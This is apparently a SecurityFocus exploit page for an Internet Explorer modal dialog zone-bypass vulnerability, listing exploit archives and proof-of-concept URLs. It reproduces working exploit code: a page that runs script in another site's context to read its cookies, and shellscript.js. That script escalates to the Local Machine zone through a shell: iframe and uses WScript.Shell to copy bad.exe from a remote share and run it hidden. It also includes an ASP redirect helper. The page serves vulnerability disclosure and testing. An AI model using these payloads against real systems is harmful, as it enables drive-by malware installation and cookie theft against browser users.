Microsoft Internet Explorer Modal Dialog Zone Bypass Vulnerability

An ASP version of this exploit is available at the following location:
http://ferruh.mavituna.com/article/?553

An updated version of the Jelmer exploit implemented in ASPX (The-Insider.zip) has been published by Rafel Ivgi. Further details regarding this exploit can be found in the associated discussion reference.

An updated version of the Jelmer exploit implemented in PHP (dir.zip) has been published by Liu Die Yu. The payload.exe executable has been removed from the exploit archive. Further details regarding this exploit can be found in the associated discussion reference.

There are reports of exploits circulating in the wild that use this issue in combination with BID 10472.

A proof-of-concept has been published at the following location:

http://62.131.86.111/security/idiots/repro/installer.htm

An additional proof of concept is also available. The exploit page navigates its own window to another site and opens a modal dialog, passing its window object as the dialog argument; the dialog hands that reference back through returnValue, and the exploit page then assigns a javascript: URL to it. Because the window has meanwhile navigated to the other site, the script runs in that site's security context:
Exploit page:
<HTML>
<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

location.href = "http://www.google.com/";
showModalDialog("md.htm",window).location = "JAVASCRIPT:alert(document.cookie)";
</SCRIPT>
</HTML>

md.htm contains:
<HTML>
Close this dialog when google is loaded in the main window.

<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

window.returnValue = window.dialogArguments;
</SCRIPT>
</HTML>

An additional proof of concept exploit, supplied by Ferruh Mavituna and reported to bypass vendor fixes, is available. It loads a local HTML file through the shell: scheme in an iframe, so that frame sits in the Local Machine zone, and then injects a script into the frame's body; the injected script runs with Local Machine zone privileges and uses the WScript.Shell ActiveX control to copy an executable from a null-session share and run it:
New shellscript.js
=====================================================
function injectIt() {
    // document.frames[0] is the iframe written below. It was loaded via the
    // shell: scheme, so its document is in the Local Machine zone, and script
    // inserted into its body runs with that zone's privileges (ActiveX allowed).
    document.frames[0].document.body.insertAdjacentHTML('afterBegin',
        'injected<script language="JScript" DEFER>' +
        // rF: remote executable on a null-session share (placeholders kept from
        // the original); wF: local path it is copied to before being run
        'var rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; ' +
        'var wF="%windir%\\\\_tmp.exe"; ' +
        'var o=new ActiveXObject("wscript.shell"); ' +
        'var e="%comspec% /c copy "+rF+" "+wF; ' +
        // Run the copy hidden and wait for it; on success run the copied file
        'var err=o.Run(e,0,true); if(err==0) o.Run(wF,0,false);' +
        '</script>');
}
// Load a local HTML file (Local Machine zone) in an iframe, then inject
// the script once the frame has had time to load.
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
=====================================================

An ASP equivalent of redir.jsp, for testing on IIS servers. It disables caching, busy-waits for a moment, and then answers with a 302 redirect to a res: URL (a resource inside shdoclc.dll):

redir.asp
=====================================================
<%
' Make sure the response is never served from a cache
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"

' Busy-wait delay before redirecting
For x = 1 to 500000 'Time
z = z + 10
Next

' Redirect to a local resource URL (res: scheme) inside shdoclc.dll
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
=====================================================

These files are available at:
http://ferruh.mavituna.com/exploits/fm_ieshell.zip

Copyright 2010, SecurityFocus